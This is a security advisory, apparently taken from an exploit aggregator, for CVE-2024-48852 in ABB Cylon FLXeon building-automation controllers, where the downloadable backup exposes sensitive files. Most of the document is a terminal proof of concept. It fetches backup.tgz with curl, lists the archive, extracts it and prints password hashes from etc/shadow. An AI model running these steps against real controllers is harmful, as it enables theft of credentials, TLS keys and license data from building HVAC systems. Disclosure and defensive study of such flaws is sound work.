## https://sploitus.com/exploit?id=1337DAY-ID-39915
ABB Cylon FLXeon 9.3.4 Insecure Backup Sensitive Data Exposure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnetยฎ Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnetยฎ IP and BACnet MS/TP field controllers for ASPECTยฎ and INTEGRAโข
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: A vulnerability exists due to an insecure backup.tgz file that, when obtained,
contains sensitive system files, including main.db, SSL/TLS certificates and keys,
the system shadow file with hashed passwords, and the license key. Although authentication
is required to access the backup, an attacker with access could extract these files
to retrieve stored credentials, decrypt secure communications, and escalate privileges
by cracking password hashes. This exposure poses a significant security risk, potentially
leading to unauthorized access, data breaches, and full system compromise.
MSG: "Backups will perform a full backup to a file that is downloaded to you PC. This
includes strategy data, BACnet settings, and settings made through this web interface."
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5924
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5924.php
CVE ID: CVE-2024-48852
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
$ curl -k https://7.3.3.1/api/backup \
> -o backup.tgz \
> -H "Cookie: user_sid=xxx" \
> -H "Content-type: application/json"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 37705 100 37705 0 0 15947 0 0:00:02 0:00:02 --:--:-- 15949
$ tar -tf backup.tgz
etc/systemd/
etc/systemd/resolved.conf
etc/systemd/journald.conf
etc/systemd/user/
etc/systemd/timesyncd.conf
etc/systemd/system/
etc/systemd/system/dbus-org.freedesktop.resolve1.service
etc/systemd/system/basic.target.wants/
etc/systemd/system/nfsserver.service
etc/systemd/system/psplash.service
etc/systemd/system/default.target
etc/systemd/system/dbus-org.freedesktop.network1.service
etc/systemd/system/nodejs.service
etc/systemd/system/modutils.service
etc/systemd/system/supervisord.service
etc/systemd/system/syslog.service
etc/systemd/system/systemd-udevd.service
etc/systemd/system/sysinit.target.wants/
etc/systemd/system/sysinit.target.wants/run-postinsts.service
etc/systemd/system/local-fs.target.wants/
etc/systemd/system/local-fs.target.wants/var-volatile-spool.service
etc/systemd/system/local-fs.target.wants/var-volatile-cache.service
etc/systemd/system/local-fs.target.wants/var-volatile-lib.service
etc/systemd/system/local-fs.target.wants/var-volatile-srv.service
etc/systemd/system/systemd-random-seed.service.wants/
etc/systemd/system/systemd-random-seed.service.wants/var-volatile-lib.service
etc/systemd/system/getty.target.wants/
etc/systemd/system/getty.target.wants/[emailย protected]
etc/systemd/system/telnetd.service
etc/systemd/system/network-online.target.wants/
etc/systemd/system/network-online.target.wants/systemd-networkd-wait-online.service
etc/systemd/system/nfscommon.service
etc/systemd/system/bluetooth.target.wants/
etc/systemd/system/bluetooth.target.wants/bluetooth.service
etc/systemd/system/sync-clocks.service
etc/systemd/system/stunnel.service
etc/systemd/system/lighttpd.service
etc/systemd/system/ntpd.service
etc/systemd/system/thttpd.service
etc/systemd/system/sockets.target.wants/
etc/systemd/system/sockets.target.wants/rpcbind.socket
etc/systemd/system/sockets.target.wants/dropbear.socket
etc/systemd/system/sockets.target.wants/systemd-networkd.socket
etc/systemd/system/dbus-1.service
etc/systemd/system/systemd-hostnamed.service
etc/systemd/system/multi-user.target.wants/
etc/systemd/system/multi-user.target.wants/rngd.service
etc/systemd/system/multi-user.target.wants/nodejs.service
etc/systemd/system/multi-user.target.wants/systemd-resolved.service
etc/systemd/system/multi-user.target.wants/atd.service
etc/systemd/system/multi-user.target.wants/supervisord.service
etc/systemd/system/multi-user.target.wants/machines.target
etc/systemd/system/multi-user.target.wants/media-sda1.mount
etc/systemd/system/multi-user.target.wants/strongswan.service
etc/systemd/system/multi-user.target.wants/vsftpd.service
etc/systemd/system/multi-user.target.wants/crond.service
etc/systemd/system/multi-user.target.wants/lighttpd.service
etc/systemd/system/multi-user.target.wants/ntpd.service
etc/systemd/system/multi-user.target.wants/systemd-networkd.service
etc/systemd/system/multi-user.target.wants/ntpdate.service
etc/systemd/system/multi-user.target.wants/remote-fs.target
etc/systemd/system/multi-user.target.wants/hwclock.timer
etc/systemd/system/multi-user.target.wants/gplv3-notice.service
etc/systemd/system/dhcp-server.service
etc/systemd/system/dbus-org.bluez.service
etc/systemd/system/timers.target.wants/
etc/systemd/system/timers.target.wants/logrotate.timer
etc/systemd/system/networking.service
etc/systemd/coredump.conf
etc/systemd/logind.conf
etc/systemd/network/
etc/systemd/network/30-wlan.network
etc/systemd/network/10-eth.network
etc/systemd/network/60-usb.network
etc/systemd/user.conf
etc/systemd/system.conf
etc/passwd
etc/group
etc/shadow
etc/gshadow
etc/hostname
usr/local/aam/etc/com.properties
usr/local/aam/etc/bdt.txt
usr/local/aam/etc/bdt2.txt
usr/local/aam/etc/dynamic.db
usr/local/aam/etc/main-bkup.db
usr/local/aam/etc/main.db
usr/local/aam/etc/priArray.db
usr/local/aam/etc/license.txt
etc/localtime
home/MIX_CMIX/node-server/certs/
home/MIX_CMIX/node-server/certs/cbxi.cert.pem
home/MIX_CMIX/node-server/certs/cbxi.key.pem
home/MIX_CMIX/node-server/certs/intermediate.cert.pem
home/MIX_CMIX/node-server/certs/kennesaw-ca.crt
usr/local/aam/fud/
usr/local/aam/fud/store/
$ tar -xf backup.tgz -C backup_extracted
$ tail -n 2 backup_extracted/etc/shadow
admin:$6$CYDLiwrd/dJ6GBxa$FZxr6hz56.FkEDlz2No/lZiEwX/ArpBbf/jIuLOKpPLDRy02ur0pXsVVCYdR8HmKOudNEtlNGpRh4Nkgk.s3S/:17901:0:99999:7:::
cxpro:$6$tJ.mhJzEwaMWh01A$7ureB0a6.mcxhLGLwyRUeOhykLPf/FOXqWT.729Q/rjIamCGFUsxuptdrvX7GdEAy3ayzhzD8e14M.ftzyXGn0:17901:0:99999:7:::